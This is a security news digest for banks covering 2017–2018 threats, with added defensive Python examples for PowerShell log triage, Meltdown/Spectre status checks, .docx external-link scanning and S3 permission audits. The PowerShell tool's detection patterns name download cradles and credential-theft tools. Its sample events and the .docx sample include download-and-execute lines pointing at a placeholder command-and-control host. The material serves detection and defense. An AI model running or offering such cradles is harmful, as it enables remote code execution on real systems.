Azure Guest Agent Design Enables Plaintext Password Theft

Researchers from Guardicore found that attackers can abuse the design of the Microsoft Azure Guest Agent to recover plaintext administrator passwords from Azure virtual machines.  The weakness affects any Azure machine, Windows or Linux, on which the Azure reset password tool has been used: the configuration files the tool leaves behind on the machine can be used to recover the password that was set.  Microsoft recommends that customers follow Azure security best practices to protect against this attack.  Azure users are also urged to check whether reset password configuration files are still stored on their Azure machines and, if so, delete them.

Relevant URL(s): https://www.darkreading.com/vulnerabilities---threats/azure-guest-agent-design-enables-plaintext-password-theft-/d/d-id/1331317

Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors

Joint analysis by the Department of Homeland Security (DHS) and the FBI uncovered Russian government cyber activity targeting U.S. Government entities and organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.  The campaign had two kinds of victims: staging targets and intended targets.  The initial victims were most often trusted third-party suppliers with less secure networks, which the actors used as pivot points to reach the networks of their intended victims.  Once inside, the actors conducted network reconnaissance, moved laterally, and collected information about industrial control systems.  Banks should load the indicators of compromise provided by DHS and the FBI into their detection tooling to help identify and block this activity.

Relevant URL(s): https://www.us-cert.gov/ncas/alerts/TA18-074A

Malware Leveraging PowerShell Grew 432% in 2017

According to McAfee, the number of new PowerShell malware samples observed in 2017 was 432% higher than in 2016, with a 267% increase in the fourth quarter alone.  Attackers take advantage of PowerShell’s legitimate functionality to carry out malicious activity such as command and control communications, credential theft, and privilege escalation, and to conceal lateral movement on breached networks.  Banks can better protect their systems by ensuring network segmentation is properly implemented and by restricting PowerShell wherever it is not needed.  Disabling PowerShell outright is rarely practical, since much Windows administration depends on it; removing the legacy PowerShell 2.0 engine, applying constrained language mode for non-administrative users, and turning on script block logging so that PowerShell activity is visible to the security team are more workable controls.

Relevant URL(s): https://www.darkreading.com/vulnerabilities---threats/malware-leveraging-powershell-grew-432--in-2017/d/d-id/1331255
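For the PowerShell item above, the following is an added example (not code from the page or from McAfee) of what a team can do with script block logging once it is on: triage the logged script text for the tradecraft the article lists, decoding any -EncodedCommand payloads first, since those are base64 over UTF-16LE rather than UTF-8. The event records, indicator names, scoring threshold and hostnames are all constructed for the example.

```python
"""Triage PowerShell script-block log text for common malicious tradecraft.

Added example (not code from the page or from McAfee). The input is a few
constructed script blocks of the kind Windows writes to Event ID 4104 in the
Microsoft-Windows-PowerShell/Operational log once script block logging is on.
"""
import base64
import re

# One regex per technique; each name describes what the pattern catches.
INDICATORS = {
    "download_cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I),
    "invoke_expression": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "base64_payload": re.compile(r"FromBase64String", re.I),
    "hidden_noprofile": re.compile(
        r"-(?:nop|noprofile)\b.*-(?:w|windowstyle)\s+hidden|-(?:w|windowstyle)\s+hidden.*-(?:nop|noprofile)\b", re.I),
    "in_memory_loader": re.compile(r"Reflection\.Assembly\]::Load|VirtualAlloc|Add-Type", re.I),
    "credential_access": re.compile(r"Invoke-Mimikatz|sekurlsa|lsass", re.I),
    "amsi_tamper": re.compile(r"amsiInitFailed|AmsiUtils", re.I),
}

# -EncodedCommand and its short forms, followed by a base64 blob.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_commands(text):
    """Return the decoded payload of every -EncodedCommand found in text.

    PowerShell base64-encodes the UTF-16LE bytes of the script, so the decode
    must use that encoding rather than UTF-8.
    """
    payloads = []
    for match in ENCODED_FLAG.finditer(text):
        try:
            payloads.append(base64.b64decode(match.group(1)).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not really base64; the raw text is still scanned
    return payloads


def analyze_script_block(text):
    """Score one script block: the indicators it matches after decoding."""
    payloads = decode_encoded_commands(text)
    haystack = "\n".join([text] + payloads)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    return {"indicators": hits, "decoded": payloads, "score": len(hits)}


def scan_events(events, threshold=2):
    """Return (record_id, analysis) for events matching >= threshold indicators.

    A single indicator (for example Invoke-WebRequest on its own) is common in
    legitimate administration; requiring two removes most of that noise.
    """
    flagged = []
    for event in events:
        analysis = analyze_script_block(event["script_block"])
        if analysis["score"] >= threshold:
            flagged.append((event["record_id"], analysis))
    return flagged


# Constructed sample events (not real log data); the hostnames are placeholders.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s.ps1')"
    .encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"record_id": 1, "script_block": "Get-ChildItem C:\\Users -Recurse | Measure-Object"},
    {"record_id": 2, "script_block":
        "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
        ".DownloadString('http://c2.example.invalid/a.ps1')\""},
    {"record_id": 3, "script_block": "powershell -enc " + _ENCODED},
    {"record_id": 4, "script_block":
        "Invoke-WebRequest https://downloads.example.invalid/tool.zip -OutFile tool.zip"},
]

if __name__ == "__main__":
    for record_id, analysis in scan_events(SAMPLE_EVENTS):
        print(record_id, analysis["indicators"], analysis["decoded"])
```

Run as a script it prints records 2 and 3; record 4 (a lone Invoke-WebRequest) stays below the threshold, which is the trade-off a real deployment tunes against its own administrative baseline.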

North Korea Threat Group Targeting Turkish Financial Orgs

In March, McAfee reported finding malware associated with the North Korean group Hidden Cobra on Turkish systems belonging to three large financial institutions and at least two major government-controlled entities.  The malware, Bankshot, was distributed via sophisticated phishing emails in these latest attacks.  McAfee believes the goal was to “surveil their operations, establish functions of their processes, and ultimately compromise funds”.  Regular social engineering and phishing testing coupled with end-user awareness training can help protect against threats such as this.

Relevant URL(s): https://www.darkreading.com/attacks-breaches/north-korea-threat-group-targeting-turkish-financial-orgs/d/d-id/1331223

Threats from Mobile Ransomware & Banking Malware Are Growing

The number of unique mobile malware samples increased greatly in 2017.  Compared to the previous year, unique mobile ransomware samples increased 415%, while the number of distinct mobile banking malware samples increased by 94%.  Android is the predominant target for most malicious apps, but attackers are starting to target iOS more due to the number of potential victims.  As always, users should keep their mobile devices updated to the latest version, avoid installing apps from third-party app stores, and carefully review the permissions that apps request.  

Relevant URL(s): https://www.darkreading.com/mobile/threats-from-mobile-ransomware-and-banking-malware-are-growing-/d/d-id/1331140

SWIFT Network Used in $2 Million Heist at Indian Bank

Once again, the Society for Worldwide Interbank Financial Telecommunication (SWIFT) messaging network was leveraged to move nearly $2 million through three unauthorized remittances in February.  India-based City Union Bank's SWIFT systems were hacked and used to transfer the funds to accounts in Dubai, Turkey, and China.  City Union Bank is working with authorities to investigate and has found no evidence of internal staff involvement.  Multiple layers of security, such as continuous network monitoring, fraud detection solutions, and adaptive endpoint protection, can help protect against threats such as this.

Relevant URL(s): https://www.reuters.com/article/us-city-union-bank-swift/indias-city-union-bank-ceo-says-suffered-cyber-hack-via-swift-system-idUSKCN1G20AF

U.S. Announces Takedown of $530 Million Cyberfraud Network

The U.S. Department of Justice recently announced one of the largest cyberfraud prosecutions it has ever undertaken.  Thirty-six individuals who were part of an international cybercrime ring were charged.  The group, called Infraud, operated like a business and allegedly stole $530 million through purchases made with pilfered and counterfeit credit card information.  Consumers can better protect themselves by monitoring account balances and activity closely and reporting suspicious transactions immediately.

Relevant URL(s): https://www.paymentssource.com/articles/us-announces-take-down-of-530-million-cyberfraud-network

Criminals Obtain Code-Signing Certificates Using Stolen Corporate IDs

New research indicates that criminals are obtaining code-signing certificates issued in the names of stolen corporate identities.  Malware authors then sign their malicious software with these certificates because most systems and users treat signed code as trustworthy.  Malware signed this way is hard to spot and has been used in a wide range of attacks, including website spoofing, data exfiltration, and man-in-the-middle attacks.  Application whitelisting and sophisticated endpoint protection can help mitigate this threat, with one caveat: a whitelist that trusts any validly signed binary does not stop it, so allow rules should be pinned to specific publishers or file hashes rather than to the mere presence of a valid signature.

Relevant URL(s): https://www.darkreading.com/vulnerabilities---threats/criminals-obtain-code-signing-certificates-using-stolen-corporate-ids--/d/d-id/1331113

New Zero-Day Ransomware Evades Microsoft, Google Cloud Malware Detection

A new ransomware variant, dubbed Shurl0ckr, managed to evade the built-in malware protections on Google Drive and Microsoft Office 365.  In fact, only seven percent of 67 major antivirus platforms detected it.  Shurl0ckr has been observed being distributed via drive-by downloads and phishing emails.  Using restricted accounts for day-to-day work and leveraging adaptive endpoint security solutions can limit exposure to ransomware attacks.  

Relevant URL(s): https://www.darkreading.com/cloud/new-zero-day-ransomware-evades-microsoft-google-cloud-malware-detection/d/d-id/1330999

Over 12,000 Business Websites Leveraged for Cybercrime

Researchers found that over 12,000 websites in the business category were used to deliver malware or launch cyberattacks in 2017.  Much of this is attributed to the background sites, such as ad delivery networks, that sites in the business category contact behind the scenes.  They also found that economy and business sites ran more vulnerable software, hosted more phishing sites, and experienced more security incidents than other categories in 2017.  These threats can often be mitigated with up-to-date, adaptive web security filtering solutions.  

Relevant URL(s): https://www.darkreading.com/endpoint/over-12000-business-websites-leveraged-for-cybercrime/d/d-id/1330980

First ‘Jackpotting’ Attacks Hit U.S. ATMs

ATM “jackpotting” attacks, also known as “logical attacks”, which have long been an issue for banks in Europe and Asia, are now being seen against ATMs in the United States.  The goal of these attacks is to force the machine to dispense large volumes of cash on demand.  To carry out the attack, crooks must gain physical access to the ATM in order to attach specialized electronics and/or install malware that controls the machine.  Banks should consider every point where an ATM could be vulnerable to physical tampering, such as USB and network ports, and implement appropriate safeguards.  All ATMs should also run supported operating systems.

Relevant URL(s): https://krebsonsecurity.com/2018/01/first-jackpotting-attacks-hit-u-s-atms/

How to Protect Yourself from Meltdown and Spectre CPU Flaws

In early January, researchers disclosed two serious classes of flaws in modern processors, Spectre and Meltdown.  Meltdown affects nearly every Intel processor released in the last 20 years, while Spectre also affects the AMD and Arm chips in phones, laptops, and tablets.  The processor manufacturers believe the flaws can be fixed or mitigated with software and microcode updates, and Apple, Microsoft, and Google have already released some mitigations.  Intel's initial microcode updates, delivered as BIOS updates by PC makers, caused some systems to reboot unexpectedly and Intel asked partners to stop deploying them; operating system patches should nonetheless be applied as soon as possible to mitigate the effects of these flaws.

Relevant URL(s): https://www.cnet.com/uk/how-to/how-to-fix-meltdown-spectre-intel-amd-arm-windows-mac-android-ios/
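For the Meltdown and Spectre item above, an added example (not from the CNET article) of how to verify on a Linux host that the operating system patches are actually in effect rather than merely installed. Kernels from 4.15, and distribution kernels that backported the fixes, expose one file per issue under /sys/devices/system/cpu/vulnerabilities; the status lines in the sample are constructed to match the kernel's wording, and the fake sysfs directory is there only so the check can be exercised off-box.

```python
"""Report Linux kernel mitigation status for Meltdown and Spectre from sysfs.

Added example (not from the CNET article). Each file under the sysfs directory
reads "Not affected", "Vulnerable" (optionally with detail), or
"Mitigation: <detail>"; a kernel that predates the fixes has no files at all.
"""
import os
import sys
import tempfile

SYSFS_DIR = "/sys/devices/system/cpu/vulnerabilities"
# The three issues disclosed in January 2018; later kernels add more files.
ISSUES = ("meltdown", "spectre_v1", "spectre_v2")


def read_status(directory=SYSFS_DIR):
    """Map each issue to its sysfs line, or '' when the file does not exist."""
    status = {}
    for name in ISSUES:
        try:
            with open(os.path.join(directory, name)) as fh:
                status[name] = fh.read().strip()
        except OSError:
            status[name] = ""
    return status


def classify(line):
    """Collapse a sysfs line into one of four states."""
    if not line:
        # No file: the running kernel predates the fixes, so it cannot be
        # mitigated either. Treat it as needing action, not as unknown-but-fine.
        return "unpatched_kernel"
    if line.startswith("Not affected"):
        return "not_affected"
    if line.startswith("Mitigation:"):
        return "mitigated"
    return "vulnerable"


def unmitigated(directory=SYSFS_DIR):
    """Issues for which the host still needs action, in sorted order."""
    return sorted(name for name, line in read_status(directory).items()
                  if classify(line) in ("vulnerable", "unpatched_kernel"))


def make_sample_dir(values):
    """Write a constructed sysfs lookalike so the check can run off-box."""
    directory = tempfile.mkdtemp(prefix="cpu-vulns-")
    for name, line in values.items():
        with open(os.path.join(directory, name), "w") as fh:
            fh.write(line + "\n")
    return directory


# Constructed status lines modelled on the kernel's wording (not captured output):
# a host whose kernel mitigates Meltdown and Spectre v1 but not Spectre v2.
SAMPLE_PARTIAL = {
    "meltdown": "Mitigation: PTI",
    "spectre_v1": "Mitigation: __user pointer sanitization",
    "spectre_v2": "Vulnerable",
}

if __name__ == "__main__":
    # Pass a directory to inspect a fake; with no argument it reads the real sysfs.
    target = sys.argv[1] if len(sys.argv) > 1 else SYSFS_DIR
    for name, line in read_status(target).items():
        print(f"{name:<11} {classify(line):<16} {line}")
    sys.exit(1 if unmitigated(target) else 0)
```

The non-zero exit status makes the script usable from a fleet-wide compliance job; a missing file is deliberately counted as a failure, since a kernel that does not report on Meltdown cannot be mitigating it either.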

BEC Attacks to Exceed $9B in 2018: Trend Micro

Less than a year ago, the FBI reported that business email compromise (BEC) attacks were a $5.3 billion industry; Trend Micro now projects that BEC losses will exceed $9 billion in 2018.  In BEC attacks, crooks typically rely on social engineering, or they steal email login credentials through phishing emails or malware and then send payment requests from the compromised mailbox.  End-user awareness training is critical to preventing these attacks, and significant transactions should always require dual approval and out-of-band verbal verification with the requester, using a phone number already on file rather than one supplied in the email.

Relevant URL(s): https://www.darkreading.com/vulnerabilities---threats/bec-attacks-to-exceed-$9b-in-2018-trend-micro/d/d-id/1330853

World Economic Forum: Cyber-Attacks Third Most Likely Global Risk in 2018

According to the World Economic Forum’s 2018 Global Risks Report, cyber-attacks are the third most likely global risk this year, with data fraud or theft in fourth place.  This shows how much the prevalence and disruptive potential of cyber-risks have grown recently.  As cyber-risks continue to affect organizations in new and broader ways, risk management should be a high priority.

Relevant URL(s): https://www.infosecurity-magazine.com/news/cyberattacks-global-risk-2018/
 

Website Glitch Let Me Overstock My Coinbase

In 2014, Overstock.com became one of the first e-commerce vendors to accept bitcoin by partnering with Coinbase.  Earlier this month, Bancsec identified a flaw with Coinbase and Overstock.com that allowed customers to purchase items at a small fraction of the listed price.  Even worse, this flaw allowed customers paying with bitcoin to receive a refund much larger than what they had paid when the order was canceled.  Coinbase has since implemented a fix to resolve the issue.  

Relevant URL(s): https://krebsonsecurity.com/2018/01/website-glitch-let-me-overstock-my-coinbase/
 

Cron-Linked Malware Impersonates 2,200 Banking Apps

Researchers have discovered a new Android malware dubbed the Catelites Bot, which shares similarities with the CronBot banking Trojan that was used to steal $900,000. This new malware is designed to harvest payment card details and banking credentials from customers of over 2,200 financial institutions. Android users should avoid installing apps from third-party app sources and should always carefully review the permissions that apps request.

Relevant URL(s): https://www.infosecurity-magazine.com/news/cronlinked-malware-impersonates/

Researchers Find Trove of 1.4 Billion Breached Credentials

An aggregated, searchable database of over 1.4 billion breached credentials was recently discovered on the dark web. The list, which includes plaintext passwords from known breaches such as LinkedIn and Bitcoin, is nearly twice the size of the previous largest find. Multi-factor authentication can help mitigate account takeover attempts, and passwords should never be reused across multiple services, since a reused password from any one of these breaches unlocks every other account that shares it.

Relevant URL(s): https://www.infosecurity-magazine.com/news/researchers-trove-14-billion/

Hidden Backdoor Found In WordPress Captcha Plugin Affects Over 300,000 Sites

An undisclosed buyer purchased a Captcha WordPress plugin with more than 300,000 active installations from developer BestWebSoft, then modified it to download and install a hidden backdoor. This backdoor allowed the plugin's new owner or other attackers to gain remote administrative access to WordPress sites without any authentication. WordPress removed the affected Captcha plugin from its official plugin directory. Website administrators are urged to replace this plugin with the latest official Captcha version to mitigate this threat.

Relevant URL(s): https://thehackernews.com/2017/12/wordpress-security-plugin.html

Microsoft Office Docs New Vessel for Loki Malware

A new attack has been identified that delivers Loki malware through malicious “scriptlets” loaded by Microsoft Office applications. These scriptlets, which are pulled in via external links embedded in the documents, often bypass traditional antivirus because the documents themselves contain no shellcode, macros, or DDE functionality. Loki is a type of malware designed to steal usernames and passwords from email clients, browsers, FTP clients, and file management software. This attack exploits a vulnerability Microsoft patched in April 2017, with a follow-up update in September 2017. Banks should always ensure critical security vulnerabilities are patched as promptly as possible to protect against threats such as this.

Relevant URL(s): https://www.darkreading.com/attacks-breaches/microsoft-office-docs-new-vessel-for-loki-malware/d/d-id/1330678
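For the Loki item above, an added example (not from the Dark Reading article) of a mail-gateway style check for the delivery mechanism it describes: a .docx is a zip, every part's relationships live in a *.rels XML file, and a relationship with TargetMode="External" points outside the document. The scan lists every external relationship and flags the ones that can execute, namely OLE objects loaded from outside the file and remote targets with a script extension. The sample document, its relationship IDs and the hostnames are constructed; ordinary hyperlinks are reported but not flagged.

```python
"""Flag external relationship targets inside a Word .docx.

Added example (not from the Dark Reading article). The constructed sample
contains one ordinary hyperlink and one OLE object that fetches a remote
scriptlet, which is the shape of document the article describes.
"""
import io
import xml.etree.ElementTree as ET
import zipfile

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Remote targets with these extensions are executable content, not documents.
SCRIPT_EXTENSIONS = (".sct", ".hta", ".vbs", ".js", ".wsf", ".ps1")


def external_relationships(docx_bytes):
    """Every relationship in any .rels part that points outside the package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as package:
        for name in package.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(package.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                found.append({
                    "part": name,
                    "id": rel.get("Id"),
                    # The Type URI ends in the relationship kind (hyperlink, oleObject, ...).
                    "kind": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": rel.get("Target", ""),
                })
    return found


def suspicious_relationships(docx_bytes):
    """External links that can execute: OLE objects sourced from outside the
    file, or any remote target whose extension is a script type."""
    flagged = []
    for rel in external_relationships(docx_bytes):
        target = rel["target"].lower().split("?", 1)[0]
        remote = target.startswith(("http://", "https://", "file:", "\\\\"))
        if rel["kind"] == "oleObject" or (remote and target.endswith(SCRIPT_EXTENSIONS)):
            flagged.append(rel)
    return flagged


def build_sample_docx(rels_xml):
    """Assemble a minimal .docx in memory around the given document.xml.rels."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as package:
        package.writestr("[Content_Types].xml", "<Types/>")
        package.writestr("word/document.xml", "<document/>")
        package.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed relationships part; the hostnames are placeholders.
SAMPLE_RELS = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.example.com/" TargetMode="External"/>
  <Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://c2.example.invalid/update.sct" TargetMode="External"/>
</Relationships>
"""

if __name__ == "__main__":
    for rel in suspicious_relationships(build_sample_docx(SAMPLE_RELS)):
        print(rel["part"], rel["id"], rel["kind"], rel["target"])
```

Pointing external_relationships at a real attachment (read the file's bytes and pass them in) works unchanged, because the scan only depends on the package layout, not on the sample builder.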

Massive Cloud Leak Exposes Alteryx, Experian, US Census Bureau Data

A substantial data leak resulting from a misconfigured Amazon Web Services S3 storage bucket, disclosed in December, exposed sensitive data on 123 million American households. The leaked data contained information from analytics firm Alteryx and its partners Experian and the US Census Bureau and included details on financial histories, contact information, and mortgage ownership. S3 buckets are private by default; this one was exposed by an access grant to AWS's “Authenticated Users” group, which covers anyone holding any AWS account rather than only the owner's own users. To limit risk, banks should probe the security culture and controls of their third-party vendors, including how they review cloud storage permissions, and ensure they meet expectations.

Relevant URL(s): https://www.darkreading.com/cloud/massive-cloud-leak-exposes-alteryx-experian-us-census-bureau-data/d/d-id/1330673
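For the S3 item above, an added example (not from the Dark Reading article) of the permission review a bucket owner, or a bank auditing a vendor, can run to catch this class of misconfiguration. It inspects two things: the bucket ACL, for grants to the global AllUsers or AuthenticatedUsers groups (the latter is what exposed the Alteryx bucket), and the bucket policy, for Allow statements open to every principal. The inputs have the shape of boto3's get_bucket_acl() result and the JSON string in get_bucket_policy()['Policy'], so the functions can be pointed at live output; the ACLs, policy, bucket name and owner ID below are constructed.

```python
"""Audit an S3 bucket's ACL and bucket policy for public or any-AWS-account access.

Added example (not from the Dark Reading article). The data here is constructed;
the functions accept the structures boto3 returns for a real bucket.
"""
import json

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTHENTICATED_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"


def acl_findings(acl):
    """Grants to either global group; both make the bucket public in practice."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") != "Group":
            continue
        if grantee.get("URI") == ALL_USERS:
            findings.append(f"ACL grants {grant.get('Permission')} to anyone on the internet")
        elif grantee.get("URI") == AUTHENTICATED_USERS:
            # "Authenticated" means any AWS account in the world, not the owner's users.
            findings.append(f"ACL grants {grant.get('Permission')} to any AWS account")
    return findings


def _wildcard_principal(principal):
    """True for Principal "*" or {"AWS": "*"} / {"AWS": [..., "*"]}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        return "*" in ([aws] if isinstance(aws, str) else aws)
    return False


def policy_findings(policy_json):
    """Allow statements open to every principal; a Condition narrows but does not remove them."""
    if not policy_json:
        return []
    policy = json.loads(policy_json)
    statements = policy.get("Statement", [])
    statements = [statements] if isinstance(statements, dict) else statements
    findings = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow" or not _wildcard_principal(stmt.get("Principal")):
            continue
        actions = stmt.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        note = " (limited by a Condition)" if stmt.get("Condition") else ""
        findings.append(f"policy allows {', '.join(actions)} to any principal{note}")
    return findings


def audit_bucket(acl, policy_json=None):
    """All findings for one bucket; an empty list means no public or cross-account grant."""
    return acl_findings(acl) + policy_findings(policy_json)


# Constructed ACLs and policy (not real bucket data).
OWNER = {"Type": "CanonicalUser", "ID": "0123456789abcdef" * 4, "DisplayName": "owner"}
EXPOSED_ACL = {"Owner": OWNER, "Grants": [
    {"Grantee": OWNER, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": AUTHENTICATED_USERS}, "Permission": "READ"},
]}
PRIVATE_ACL = {"Owner": OWNER, "Grants": [{"Grantee": OWNER, "Permission": "FULL_CONTROL"}]}
PUBLIC_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [{
    "Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::example-bucket/*"}]})

if __name__ == "__main__":
    for finding in audit_bucket(EXPOSED_ACL, PUBLIC_POLICY):
        print("FINDING:", finding)
    print("private bucket findings:", audit_bucket(PRIVATE_ACL))
```

The ACL check is the one that matters for this incident: a READ grant to AuthenticatedUsers looks harmless in the console wording but lets any AWS customer list and download the bucket.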